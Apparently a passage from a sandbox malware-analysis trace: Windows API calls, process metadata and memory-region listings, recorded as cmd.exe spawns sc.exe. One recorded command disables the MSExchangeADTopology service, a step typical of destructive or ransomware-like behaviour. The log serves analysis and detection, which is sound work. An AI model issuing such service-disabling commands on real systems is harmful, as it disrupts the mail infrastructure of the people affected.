_wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0134.695] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0134.695] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0134.695] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0134.695] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0134.695] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0134.695] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0134.696] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0134.696] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0134.696] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0134.696] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0134.696] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0134.696] _wcsicmp (_String1="sc", _String2="START") returned -17 [0134.696] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0134.696] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0134.696] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0134.696] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0134.696] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0134.696] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0134.696] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0134.696] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0134.696] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0134.696] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0134.696] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0134.696] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0134.696] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0134.696] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0134.696] SetErrorMode (uMode=0x0) returned 0x0 [0134.696] SetErrorMode (uMode=0x1) returned 0x0 [0134.696] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x51205d0, lpFilePart=0x4f3f17c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f3f17c*="Desktop") returned 0x1d [0134.696] SetErrorMode (uMode=0x0) returned 0x1 [0134.696] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0134.696] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.704] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.704] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.704] GetConsoleTitleW (in: lpConsoleTitle=0x4f3f3fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.704] InitializeProcThreadAttributeList (in: lpAttributeList=0x4f3f328, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4f3f30c | out: lpAttributeList=0x4f3f328, lpSize=0x4f3f30c) returned 1 [0134.704] UpdateProcThreadAttribute (in: lpAttributeList=0x4f3f328, dwFlags=0x0, Attribute=0x60001, lpValue=0x4f3f314, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4f3f328, lpPreviousValue=0x0) returned 1 [0134.704] GetStartupInfoW (in: lpStartupInfo=0x4f3f360 | out: lpStartupInfo=0x4f3f360*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.704] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0134.705] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0134.705] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.706] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc config MSExchangeADTopology start= disabled", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x4f3f2b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc config MSExchangeADTopology start= disabled", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4f3f2fc | out: lpCommandLine="sc config MSExchangeADTopology start= disabled", lpProcessInformation=0x4f3f2fc*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xcc4, dwThreadId=0x224)) returned 1 [0134.712] CloseHandle (hObject=0xa4) returned 1 [0134.712] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.712] GetEnvironmentStringsW () returned 0x5129f10* [0134.712] FreeEnvironmentStringsA (penv="=") returned 1 [0134.712] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0134.758] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x4f3f294 | out: lpExitCode=0x4f3f294*=0x424) returned 1 [0134.758] CloseHandle (hObject=0xa8) returned 1 [0134.759] _vsnwprintf (in: _Buffer=0x4f3f37c, _BufferCount=0x13, _Format="%08X", _ArgList=0x4f3f29c | out: _Buffer="00000424") returned 8 [0134.759] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0134.759] GetEnvironmentStringsW () returned 0x512b3b0* [0134.759] FreeEnvironmentStringsA (penv="=") returned 1 [0134.759] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.759] GetEnvironmentStringsW () returned 0x512b3b0* [0134.759] FreeEnvironmentStringsA (penv="=") returned 1 [0134.759] DeleteProcThreadAttributeList (in: lpAttributeList=0x4f3f328 | out: lpAttributeList=0x4f3f328) [0134.759] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.759] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0134.759] _get_osfhandle (_FileHandle=1) returned 0x3c [0134.759] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0134.759] _get_osfhandle (_FileHandle=0) returned 0x38 [0134.759] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0134.759] SetConsoleInputExeNameW () returned 0x1 [0134.759] GetConsoleOutputCP () returned 0x1b5 [0134.760] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0134.760] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.760] exit (_Code=1060) Thread: id = 583 os_tid = 0xda8 Process: id = "183" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x40489000" os_pid = "0xb08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "182" os_parent_pid = "0xdd4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9384 start_va = 0x7f7d4000 end_va = 0x7f7d4fff entry_point = 0x0 region_type = private name = "private_0x000000007f7d4000" filename = "" Region: id = 9385 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9386 start_va = 0xddc5f20000 end_va = 0xddc5f3ffff entry_point = 0x0 region_type = private name = "private_0x000000ddc5f20000" filename = "" Region: id = 9387 start_va = 0xddc5f40000 end_va = 0xddc5f53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ddc5f40000" filename = "" Region: id = 9388 start_va = 0xddc5f60000 end_va = 0xddc5f9ffff entry_point = 0x0 region_type = private name = "private_0x000000ddc5f60000" filename = "" Region: id = 9389 start_va = 0x7df5ff4d0000 end_va = 0x7ff5ff4cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff4d0000" filename = "" Region: id = 9390 start_va = 0x7ff6c47c0000 end_va = 0x7ff6c47e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47c0000" filename = "" Region: id = 9391 start_va = 0x7ff6c47ec000 end_va = 0x7ff6c47ecfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47ec000" filename = "" Region: id = 9392 start_va = 0x7ff6c47ee000 end_va = 0x7ff6c47effff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47ee000" filename = "" Region: id = 9393 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 9394 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9395 start_va = 0xddc5f20000 end_va = 0xddc5f2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ddc5f20000" filename = "" Region: id = 9396 start_va = 0xddc5f30000 end_va = 0xddc5f36fff entry_point = 0x0 region_type = private name = "private_0x000000ddc5f30000" filename = "" Region: id = 9397 start_va = 0xddc5fa0000 end_va = 0xddc605dfff entry_point = 0xddc5fa0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9398 start_va = 0xddc6060000 end_va = 0xddc609ffff entry_point = 0x0 region_type = private name = "private_0x000000ddc6060000" filename = "" Region: id = 9399 start_va = 0xddc60a0000 end_va = 0xddc60a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ddc60a0000" filename = "" Region: id = 9400 start_va = 0xddc60b0000 end_va = 0xddc60bffff entry_point = 0x0 region_type = private name = "private_0x000000ddc60b0000" filename = "" Region: id = 9401 start_va = 0xddc60c0000 end_va = 0xddc60c6fff entry_point = 0x0 region_type = private name = "private_0x000000ddc60c0000" filename = "" Region: id = 9402 start_va = 0xddc60d0000 end_va = 0xddc60d0fff entry_point = 0x0 region_type = private name = "private_0x000000ddc60d0000" filename = "" Region: id = 9403 start_va = 0xddc60e0000 end_va = 0xddc60e0fff entry_point = 0x0 region_type = private name = "private_0x000000ddc60e0000" filename = "" Region: id = 9404 start_va = 0xddc6150000 end_va = 0xddc624ffff entry_point = 0x0 region_type = private name = "private_0x000000ddc6150000" filename = "" Region: id = 9405 start_va = 0xddc6250000 end_va = 0xddc63d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ddc6250000" filename = "" Region: id = 9406 start_va = 0xddc63e0000 end_va = 0xddc6560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ddc63e0000" filename = "" Region: id = 9407 start_va = 0xddc6570000 end_va = 0xddc796ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ddc6570000" filename = "" Region: id = 9408 start_va = 0x7ff6c46c0000 end_va = 0x7ff6c47bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c46c0000" filename = "" Region: id = 9409 start_va = 0x7ff6c47ea000 end_va = 0x7ff6c47ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c47ea000" filename = "" Region: id = 9410 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 9411 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 9412 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9413 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 9414 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 9415 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9416 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 9417 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9418 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9419 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 9420 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 9421 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 9422 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 9423 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 580 os_tid = 0xdc4 Thread: id = 581 os_tid = 0xd10 Thread: id = 582 os_tid = 0xcb0 Process: id = "184" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x10d84000" os_pid = "0xcc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "182" os_parent_pid = "0xdd4" cmd_line = "sc config MSExchangeADTopology start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9437 start_va = 0x90000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 9438 start_va = 0xb0000 end_va = 0xb1fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 9439 start_va = 0xc0000 end_va = 0xd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9440 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 9441 start_va = 0x120000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 9442 start_va = 0x160000 end_va = 0x163fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 9443 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 9444 start_va = 0x180000 end_va = 0x181fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 9445 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 9446 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 9447 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9448 start_va = 0x7f7e0000 end_va = 0x7f802fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f7e0000" filename = "" Region: id = 9449 start_va = 0x7f805000 end_va = 0x7f805fff entry_point = 0x0 region_type = private name = "private_0x000000007f805000" filename = "" Region: id = 9450 start_va = 0x7f80a000 end_va = 0x7f80cfff entry_point = 0x0 region_type = private name = "private_0x000000007f80a000" filename = "" Region: id = 9451 start_va = 0x7f80d000 end_va = 0x7f80dfff entry_point = 0x0 region_type = private name = "private_0x000000007f80d000" filename = "" Region: id = 9452 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9453 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9454 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 9455 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9456 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 9457 start_va = 0x240000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 9458 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9459 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9460 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 9461 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9462 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 9463 start_va = 0xa0000 end_va = 0xa3fff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 9464 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 9465 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9466 start_va = 0x250000 end_va = 0x30dfff entry_point = 0x250000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9467 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 9468 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9469 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9470 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9471 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9472 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9473 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9474 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9475 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9476 start_va = 0x7f6e0000 end_va = 0x7f7dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6e0000" filename = "" Region: id = 9477 start_va = 0x7f807000 end_va = 0x7f809fff entry_point = 0x0 region_type = private name = "private_0x000000007f807000" filename = "" Region: id = 9478 start_va = 0x420000 end_va = 0x4fefff entry_point = 0x420000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 9479 start_va = 0x210000 end_va = 0x221fff entry_point = 0x210000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 584 os_tid = 0x224 [0134.746] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0134.746] __set_app_type (_Type=0x1) [0134.746] __p__fmode () returned 0x77ac4d6c [0134.746] __p__commode () returned 0x77ac5b1c [0134.746] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0134.746] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0134.747] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.749] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, 